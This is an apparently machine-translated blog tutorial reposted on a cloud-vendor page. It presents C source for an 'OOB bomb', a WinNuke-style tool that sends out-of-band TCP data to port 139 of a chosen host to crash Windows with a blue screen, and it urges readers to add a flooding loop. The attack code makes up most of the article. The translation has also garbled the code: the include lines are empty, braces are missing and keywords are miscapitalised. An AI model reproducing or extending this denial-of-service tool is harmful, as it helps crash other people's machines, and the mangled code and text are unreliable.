Production of OOB bomb in Linux

Source: Internet
Author: User
Tags htons
Two years ago, the article was taken to fill the facade. ------------------ Create an OOB bomb in Linux

(Author: mikespook | Release Date: | views: 466)

Keywords: Linux, OOB bomb, Network Programming
This article is only intended to provide guidance to many cainiao like me. If you are a master or have no interest in programming. We recommend that you do not waste time here.

I remember when I was in high school, I first came into contact with the winnuck blue screen bomb. At that time, it was very mysterious. Later I realized that the so-called Blue Screen bomb was the OOB bomb.
First, let's know what a OOB bomb is. The OOB bomb, as its name implies, is to send an OOB message to the other party, resulting in abnormal errors due to operating system vulnerabilities (usually blue screen, gu de blue screen bomb ). Of course, the operating system here is windows.
The following describes how to compile an OOB bomb based on your strengths. I have not tested this program for many reasons. There are no conditions. I am not sure this is a usable version, because as far as I know, Ms has already fixed this vulnerability. Today's article is a souvenir! Let's take a look at the fact that the original bomb was not so good (although it was said, it was still highly popular to write a good bomb, such as the SYN flood that has recently become popular ).
/* ------------------------------ Oob_bomb.c -----------------------------------*/
/* Gcc-o tcpscan scan. C */
/* OOB bomb */
/* Mikespook */
/* 2002.5.21 */
# Include
# Include
# Include
# Include
# Include

/* This function is used to check whether the input parameter is an IP address or a host name */
Int correcthost (const char * Host, struct sockaddr_in * sock );

Main (INT argc, int * argv [])
/* The port to be attacked. Generally, the default port for OOB bombs is port 139 */
Int n_port;
/* Socket socket */
Int sock_id;
/* Return Error Code */
Int rtn_err;
/* Socket structure, which is used to establish connections and send messages */
Struct sockaddr_in remote_sock;
/* Message */
Char * pc_msg;
/* Process command line parameters */
If (argc! = 4 ){
If (argc! = 3 ){
If (argc! = 2 ){
Printf ("Usage: oob_bomb [Port] [Message]/n ");
Printf ("writen by mikespook/N ");
Printf (" subject: report for bomb/N ");
Exit (0 );
} Else
/* Use the default 139 port if no port number is entered */
Remote_sock.sin_port = htons (139 );
} Else
/* Otherwise, use the input port */
Remote_sock.sin_port = htons (atoi (argv [2]);
Pc_msg = ":-)";
} Else {
Remote_sock.sin_port = htons (atoi (argv [2]);
Pc_msg = (char *) argv [3];

Rtn_err = correcthost (char *) argv [1], (struct sockaddr_in *) & remote_sock );
If (rtn_err! = 0)
Exit (1 );

Remote_sock.sin_family = af_inet;
/* Create a socket interface */
Sock_id = socket (af_inet, sock_stream, 0 );
If (sock_id <0 ){
Perror ("/nsocket ");
Exit (2 );
/* Of course, the connection is required to continue */
Rtn_err = connect (sock_id, (struct sockaddr *) & remote_sock, sizeof (remote_sock ));
If (rtn_err <0 ){
Perror ("/nconnect ");
Exit (3 );
/* Ha, send a message MSG_OOB, "bomb ..."*/
Rtn_err = Send (sock_id, pc_msg, strlen (pc_msg), MSG_OOB );
If (rtn_err =-1 ){
Perror ("/nsend ");
Exit (4 );

Printf ("oob_bomb success! /N ");
Close (sock_id );
Exit (0 );
/* I have introduced this function in the production of the TCP connect scanner last time. I will not talk much about it */
Int correcthost (const char * Host, struct sockaddr_in * sock)
Struct hostent * struct_host;
If (isdigit (* Host ))
Sock-> sin_addr.s_addr = inet_addr (host );
Else {
Struct_host = gethostbyname (host );
If (struct_host! = NULL)
Bcopy (struct_host-> h_addr, (char *) & sock-> sin_addr, struct_host-> h_length );
Else {
Printf ("Get error with host name./N ");
Return 0;

Finally, when MSG_OOB messages are sent, the OOB bomb will generate a loop to send a large number of MSG_OOB messages to increase the possibility of the other party acting as a machine. I have already said how it works, and you have done the improvement. :)
Maybe something is wrong because I am a cainiao. Some details may not be taken into consideration. If you know, you may wish to give me some advice. Thank you !!

Related Article

Contact Us

The content source of this page is from Internet, which doesn't represent Alibaba Cloud's opinion; products and services mentioned on that page don't have any relationship with Alibaba Cloud. If the content of the page makes you feel confusing, please write us an email, we will handle the problem within 5 days after receiving your email.

If you find any instances of plagiarism from the community, please send an email to: and provide relevant evidence. A staff member will contact you within 5 working days.

A Free Trial That Lets You Build Big!

Start building with 50+ products and up to 12 months usage for Elastic Compute Service

  • Sales Support

    1 on 1 presale consultation

  • After-Sales Support

    24/7 Technical Support 6 Free Tickets per Quarter Faster Response

  • Alibaba Cloud offers highly flexible support services tailored to meet your exact needs.